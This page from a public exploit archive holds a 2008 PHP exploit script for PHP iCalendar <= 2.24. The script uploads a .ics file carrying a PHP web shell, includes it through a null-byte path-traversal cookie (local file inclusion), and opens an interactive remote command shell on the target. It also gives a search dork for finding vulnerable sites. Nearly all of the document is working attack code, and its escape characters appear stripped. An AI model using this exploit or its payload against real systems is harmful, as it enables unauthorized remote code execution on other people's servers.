[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit
# Published : 2008-09-21
# Author : EgiX
# Previous Title : NetArtMedia Real Estate Portal 1.2 SQL Injection Vulnerability
# Next Title : 6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability


<?php

/*
	-----------------------------------------------------------------
	PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit
	-----------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://phpicalendar.net/
	dork.....: "Powered by PHP iCalendar"
	
	[-] vulnerable code in /admin/index.php
	
	65.	// Add or Update a calendar
	66.	$addupdate_msg 	= '';
	67.	if ((isset($_POST['action']))  && ($_POST['action'] == 'addupdate')) {
	68.		for ($filenumber = 1; $filenumber < 6; $filenumber++) {
	69.			$file = $_FILES['calfile'];
	70.			$addupdate_success = FALSE;
	71.	
	72.			if (!is_uploaded_file_v4($file['tmp_name'][$filenumber])) {
	73.				$upload_error = get_upload_error($file['error'][$filenumber]);
	74.			} elseif (!is_uploaded_ics($file['name'][$filenumber])) {
	75.				$upload_error = $upload_error_type_lang;
	76.			} elseif (!copy_cal($file['tmp_name'][$filenumber], $file['name'][$filenumber])) {
	77.				$upload_error = $copy_error_lang . " " . $file['tmp_name'][$filenumber] . " - " . $calendar_path . "/" . $file['name'][$filenumber];
	78.			} else {
	79.				$addupdate_success = TRUE;
	80.			}
	81.			
	82.			if ($addupdate_success == TRUE) {
	83.				$addupdate_msg = $addupdate_msg . '<font color="green">'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].'</font><br />';
	84.			} else {
	85.				$addupdate_msg = $addupdate_msg . '<font color="red">'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].'</font><br />';
	86.			}
	87.		}
	88.	}
	
	restricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file
	(with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally
	recognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the
	same LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched!
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print "n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

print "n+---------------------------------------------------------------------------+";
print "n| PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |";
print "n+---------------------------------------------------------------------------+n";

if ($argc < 3)
{
	print "nUsage......: php $argv[0] host pathn";
	print "nExample....: php $argv[0] localhost /";
	print "nExample....: php $argv[0] localhost /phpicalendar/n";
	die();
}

$host = $argv[1];
$path = $argv[2];

$payload  = "--o0oOo0orn";
$payload .= "Content-Disposition: form-data; name="action"rnrn";
$payload .= "addupdatern";
$payload .= "--o0oOo0orn";
$payload .= "Content-Disposition: form-data; name="calfile[1]"; filename="fake_cal.ics"rnrn";
$payload .= "BEGIN:VCALENDARn<?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${die()} ?>rn";
$payload .= "--o0oOo0o--rn";

$packet   = "POST {$path}admin/index.php HTTP/1.0rn";
$packet  .= "Host: {$host}rn";
$packet  .= "Content-Length: ".strlen($payload)."rn";
$packet  .= "Content-Type: multipart/form-data; boundary=o0oOo0orn";
$packet  .= "Connection: closernrn";
$packet  .= $payload;
	
http_send($host, $packet);

$packet  = "GET {$path}preferences.php?action=setcookie HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Connection: closernrn";

preg_match("/Set-Cookie: (phpicalendar_[^=]*)=/", http_send($host, $packet), $cookie);

$data = urlencode(serialize(array("cookie_language" => "../calendars/fake_cal.ics".chr(0))));

while(1)
{
	print "nphpicalendar-shell# ";
	$cmd = trim(fgets(STDIN));
	if ($cmd != "exit")
	{
		$packet  = "GET {$path}print.php HTTP/1.0rn";
		$packet .= "Host: {$host}rn";
		$packet .= "Cookie: {$cookie[1]}={$data}rn";
		$packet .= "Cmd: ".base64_encode($cmd)."rn";
		$packet .= "Connection: closernrn";
		$output  = http_send($host, $packet);
		$shell   = explode("_code_", $output);
		preg_match("/_code_/", $output) ? print "n{$shell[1]}" : die("n[-] Exploit failed...n");
	}
	else break;
}

?>

# www.Syue.com [2008-09-21]